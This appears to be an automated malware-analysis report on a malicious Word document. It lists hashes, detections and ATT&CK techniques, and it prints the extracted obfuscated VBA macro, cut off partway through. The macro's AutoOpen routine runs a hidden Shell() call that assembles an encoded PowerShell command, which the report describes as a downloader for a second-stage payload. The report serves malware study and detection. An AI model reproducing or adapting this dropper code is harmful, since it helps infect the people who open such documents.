Office (OLE) malware analysis — malicious · 36ee7a749dea5bd6

MALICIOUS

Office (OLE)

91.2 KB Created: 2018-05-30 09:46:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: e630b0484409a3835392ca9589ef2c99 SHA-1: af34ebe248d7e1c0958f1d37e755a8346828f47c SHA-256: 36ee7a749dea5bd6a47c6230ad2d21d8caedb9e495b6ff6b25360bc27e0bb31e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The `Shell()` call within the VBA code directly supports this execution flow.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6565431-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6565431-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11032 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11032 bytes
SHA-256: `6595a2a17208aa16288a894027fcbf3d422c0df03e3cbfc987c79623bc8f9749`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rGfoNwCwZZoj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function iZjOfzzK() On Error Resume Next AIoFjB = Fix(67982 / CSng(56556) * tUlEp * tAizc) VhBn = CDate(79561) EcKCJ = Fix(10786 / CSng(24438) * vdcKI * riZtTL) VhBn = CDate(82901) iZjOfzzK = RfHIq + kiidUtOiGVQ + BpsIzouv + TQIJhGca + AXGAYh + AnOPwhAiZc + jfzsAaNYS FFajj = Fix(44212 / CSng(87206) * RGzjE * vdrdQ) VhBn = CDate(84704) End Function Sub Autoopen() On Error Resume Next qJujaC = Fix(33918 / CSng(10116) * IdZwX * bZYpd) VhBn = CDate(49575) RXXfv (iZjOfzzK) VMZrf = Fix(75157 / CSng(91454) * quzGO * fCGUbP) VhBn = CDate(24697) End Sub Function RXXfv(UZbbkIEl) On Error Resume Next TJFpqB = Fix(34080 / CSng(9193) * OYdniH * WiJCRi) VhBn = CDate(51095) uzBEGnDNqF = RnDioOB + Shell(DXwWwqptCSj + (Chr(vbKeyP)) + tavaC + UZbbkIEl + rjNhP, zNMwiud + vbHide + DwVQvc) IJvXSU = Fix(3783 / CSng(18868) * WsPmq * tklTki) VhBn = CDate(71375) End Function Attribute VB_Name = "zvXzzGKh" Function RfHIq() On Error Resume Next KnszJo = Fix(80410 / CSng(59468) * nuQas * pscicn) VhBn = CDate(32711) WRClkaTZ = "owersHeLL " + "-WinD" + "owsTyle hidde" + "n -e IAA" + "uACAAKAAg" + "ACQAUABzAEgAbwB" + "NAEUAWwA0A" + "F0AKwAkAFAAcwBo" + "AG8ATQBlA" YGYzwp = Fix(9606 / CSng(72628) * zwaoYc * IXFMO) VhBn = CDate(57431) SCIsMfOYG = "FsAMw" + "A0AF0AKwAnAFgA" + "JwApACA" + "AKAAgACgA" lTjsU = Fix(5683 / CSng(59079) * EtGTql * spHBHQ) VhBn = CDate(58482) JjtWvS = "KAAoACIAewA" + "zADIAf" + "QB7ADEANgB" + "9AHsANQA" zQPaV = Fix(9689 / CSng(64009) * Tuzmi * zkiIT) VhBn = CDate(83446) SSVGkNCpAK = "5AH0AewA2A" + "DUAfQB7ADUAfQB" + "7ADcAN" + "QB9AHsA" + "NAA1A" + "H0AewA2A" + "DcAfQB" + "7ADAAfQ" hFmQRi = Fix(30922 / CSng(9990) * WqHBm * FcIbXp) VhBn = CDate(75542) kOWOwLaRLSp = "B7ADIANwB9AHs" + "AMgAzAH0Ae" + "wAzADQAfQB" + "7ADIAN" + "AB9AHsAMwA" rzMfs = Fix(44542 / CSng(36734) * znkPLd * EaRzG) VhBn = CDate(47249) qDYGY = "zAH0Aew" + "A0ADkAf" + "QB7ADQANwB9" + "AHsAM" + "QA5AH0AewA" icbVi = Fix(12018 / CSng(98750) * TrujuR * zXitW) VhBn = CDate(86655) jnlbSMjFwZY = "2ADgAfQB7ADkAfQ" + "B7ADEA" + "MgB9AHsANwAyAH" + "0AewA0ADg" + "AfQB7ADYANgB" + "9AHsAMgA5AH" + "0AewA3ADMAf" QWQcS = Fix(8365 / CSng(2644) * qjAiU * EWsMAG) VhBn = CDate(36579) AjWUzTGAf = "QB7AD" + "UAMgB" + "9AHsANQAw" + "AH0Aew" + "AxAH0AewA1" + "ADQAfQB7ADQANA" Viiszb = Fix(87600 / CSng(32957) * BPKME * CnvqN) VhBn = CDate(3181) LlcEjI = "B9AHs" + "ANAAyAH0A" + "ewA1ADMAfQ" + "B7ADcAOAB9AH" + "sAMQA0AH0AewAxA" + "DcAfQB" + "7ADMAO" + "QB9AHsANQA" + "4AH0AewAxADEA" + "fQB7ADYAMgB" RfHIq = WRClkaTZ + SCIsMfOYG + JjtWvS + SSVGkNCpAK + kOWOwLaRLSp + qDYGY + jnlbSMjFwZY + AjWUzTGAf + LlcEjI End Function Function kiidUtOiGVQ() On Error Resume Next jLzVu = Fix(2002 / CSng(80333) * WnBXAl * aEaMZS) VhBn = CDate(96726) DskDbf = "9AHsA" + "NgB9AHsAMgAx" + "AH0AewA3A" + "DcAfQ" + "B7ADQAMAB9AHs" + "AMQAwAH0AewA2AD" + "AAfQB7ADQAMQB" JXzRp = Fix(49104 / CSng(9928) * FrHwW * djsbhf) VhBn = CDate(54751) ojKAwd = "9AHsAMQAzAH0" + "AewA2ADkAfQB" + "7ADMAOAB" + "9AHsAN" + "AAzAH0" + "AewAyADYA" + "fQB7ADcAN" + "gB9AH" + "sAMwA1A" + "H0AewA0AH0" oEUJM = Fix(80788 / CSng(30908) * cvisn * vkAGRX) VhBn = CDate(92503) WLARDBb = "AewA3ADQAfQB" + "7ADIANQB9AHsAMw" + "B9AHsAN" + "wAxAH0AewA1AD" + "UAfQB7" + "ADEANQB" + "9AHsAMgB9AH" + "sAMgAwAH0" + "AewA3AH0AewA2" tnWfbt = Fix(38696 / CSng(95604) * TqAjvw * NPzEOL) VhBn = CDate(30682) iPMOw = "ADMAfQB7ADYANAB" + "9AHsAMwAxAH" + "0AewA3A" + "DAAfQB7AD" + "MANgB9AHsAMQA4A" + "H0Aew" + "AzADcAf" + "QB7ADgAfQB" + "7ADQANgB9AHsA" HjlIbb = Fix(26683 / CSng(9987) * HLjmj * WhiKP) VhBn = CDate(2818) TfjOrvaol = "NQA3AH0AewAy" + "ADIAfQB" + "7ADYAMQB9AH" + "sAMgA4AH0AewA" OznUtC = Fix(45337 / CSng(84758) * hXrYu * LWJFl) VhBn = CDate(75378) ddZTGwLmo = "1ADEAf" + "QB7ADUA" + "NgB9AHsAMwAwA" + "H0AI ... (truncated)

SHA-256: 6595a2a17208aa16288a894027fcbf3d422c0df03e3cbfc987c79623bc8f9749

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rGfoNwCwZZoj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iZjOfzzK()
On Error Resume Next
AIoFjB = Fix(67982 / CSng(56556) * tUlEp * tAizc)
VhBn = CDate(79561)
EcKCJ = Fix(10786 / CSng(24438) * vdcKI * riZtTL)
VhBn = CDate(82901)
iZjOfzzK = RfHIq + kiidUtOiGVQ + BpsIzouv + TQIJhGca + AXGAYh + AnOPwhAiZc + jfzsAaNYS
FFajj = Fix(44212 / CSng(87206) * RGzjE * vdrdQ)
VhBn = CDate(84704)
End Function
Sub Autoopen()
On Error Resume Next
qJujaC = Fix(33918 / CSng(10116) * IdZwX * bZYpd)
VhBn = CDate(49575)
RXXfv (iZjOfzzK)
VMZrf = Fix(75157 / CSng(91454) * quzGO * fCGUbP)
VhBn = CDate(24697)
End Sub
Function RXXfv(UZbbkIEl)
On Error Resume Next
TJFpqB = Fix(34080 / CSng(9193) * OYdniH * WiJCRi)
VhBn = CDate(51095)
uzBEGnDNqF = RnDioOB + Shell(DXwWwqptCSj + (Chr(vbKeyP)) + tavaC + UZbbkIEl + rjNhP, zNMwiud + vbHide + DwVQvc)
IJvXSU = Fix(3783 / CSng(18868) * WsPmq * tklTki)
VhBn = CDate(71375)
End Function


Attribute VB_Name = "zvXzzGKh"
Function RfHIq()
On Error Resume Next
KnszJo = Fix(80410 / CSng(59468) * nuQas * pscicn)
VhBn = CDate(32711)
WRClkaTZ = "owersHeLL " + "-WinD" + "owsTyle hidde" + "n -e IAA" + "uACAAKAAg" + "ACQAUABzAEgAbwB" + "NAEUAWwA0A" + "F0AKwAkAFAAcwBo" + "AG8ATQBlA"
YGYzwp = Fix(9606 / CSng(72628) * zwaoYc * IXFMO)
VhBn = CDate(57431)
SCIsMfOYG = "FsAMw" + "A0AF0AKwAnAFgA" + "JwApACA" + "AKAAgACgA"
lTjsU = Fix(5683 / CSng(59079) * EtGTql * spHBHQ)
VhBn = CDate(58482)
JjtWvS = "KAAoACIAewA" + "zADIAf" + "QB7ADEANgB" + "9AHsANQA"
zQPaV = Fix(9689 / CSng(64009) * Tuzmi * zkiIT)
VhBn = CDate(83446)
SSVGkNCpAK = "5AH0AewA2A" + "DUAfQB7ADUAfQB" + "7ADcAN" + "QB9AHsA" + "NAA1A" + "H0AewA2A" + "DcAfQB" + "7ADAAfQ"
hFmQRi = Fix(30922 / CSng(9990) * WqHBm * FcIbXp)
VhBn = CDate(75542)
kOWOwLaRLSp = "B7ADIANwB9AHs" + "AMgAzAH0Ae" + "wAzADQAfQB" + "7ADIAN" + "AB9AHsAMwA"
rzMfs = Fix(44542 / CSng(36734) * znkPLd * EaRzG)
VhBn = CDate(47249)
qDYGY = "zAH0Aew" + "A0ADkAf" + "QB7ADQANwB9" + "AHsAM" + "QA5AH0AewA"
icbVi = Fix(12018 / CSng(98750) * TrujuR * zXitW)
VhBn = CDate(86655)
jnlbSMjFwZY = "2ADgAfQB7ADkAfQ" + "B7ADEA" + "MgB9AHsANwAyAH" + "0AewA0ADg" + "AfQB7ADYANgB" + "9AHsAMgA5AH" + "0AewA3ADMAf"
QWQcS = Fix(8365 / CSng(2644) * qjAiU * EWsMAG)
VhBn = CDate(36579)
AjWUzTGAf = "QB7AD" + "UAMgB" + "9AHsANQAw" + "AH0Aew" + "AxAH0AewA1" + "ADQAfQB7ADQANA"
Viiszb = Fix(87600 / CSng(32957) * BPKME * CnvqN)
VhBn = CDate(3181)
LlcEjI = "B9AHs" + "ANAAyAH0A" + "ewA1ADMAfQ" + "B7ADcAOAB9AH" + "sAMQA0AH0AewAxA" + "DcAfQB" + "7ADMAO" + "QB9AHsANQA" + "4AH0AewAxADEA" + "fQB7ADYAMgB"
RfHIq = WRClkaTZ + SCIsMfOYG + JjtWvS + SSVGkNCpAK + kOWOwLaRLSp + qDYGY + jnlbSMjFwZY + AjWUzTGAf + LlcEjI
End Function
Function kiidUtOiGVQ()
On Error Resume Next
jLzVu = Fix(2002 / CSng(80333) * WnBXAl * aEaMZS)
VhBn = CDate(96726)
DskDbf = "9AHsA" + "NgB9AHsAMgAx" + "AH0AewA3A" + "DcAfQ" + "B7ADQAMAB9AHs" + "AMQAwAH0AewA2AD" + "AAfQB7ADQAMQB"
JXzRp = Fix(49104 / CSng(9928) * FrHwW * djsbhf)
VhBn = CDate(54751)
ojKAwd = "9AHsAMQAzAH0" + "AewA2ADkAfQB" + "7ADMAOAB" + "9AHsAN" + "AAzAH0" + "AewAyADYA" + "fQB7ADcAN" + "gB9AH" + "sAMwA1A" + "H0AewA0AH0"
oEUJM = Fix(80788 / CSng(30908) * cvisn * vkAGRX)
VhBn = CDate(92503)
WLARDBb = "AewA3ADQAfQB" + "7ADIANQB9AHsAMw" + "B9AHsAN" + "wAxAH0AewA1AD" + "UAfQB7" + "ADEANQB" + "9AHsAMgB9AH" + "sAMgAwAH0" + "AewA3AH0AewA2"
tnWfbt = Fix(38696 / CSng(95604) * TqAjvw * NPzEOL)
VhBn = CDate(30682)
iPMOw = "ADMAfQB7ADYANAB" + "9AHsAMwAxAH" + "0AewA3A" + "DAAfQB7AD" + "MANgB9AHsAMQA4A" + "H0Aew" + "AzADcAf" + "QB7ADgAfQB" + "7ADQANgB9AHsA"
HjlIbb = Fix(26683 / CSng(9987) * HLjmj * WhiKP)
VhBn = CDate(2818)
TfjOrvaol = "NQA3AH0AewAy" + "ADIAfQB" + "7ADYAMQB9AH" + "sAMgA4AH0AewA"
OznUtC = Fix(45337 / CSng(84758) * hXrYu * LWJFl)
VhBn = CDate(75378)
ddZTGwLmo = "1ADEAf" + "QB7ADUA" + "NgB9AHsAMwAwA" + "H0AI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.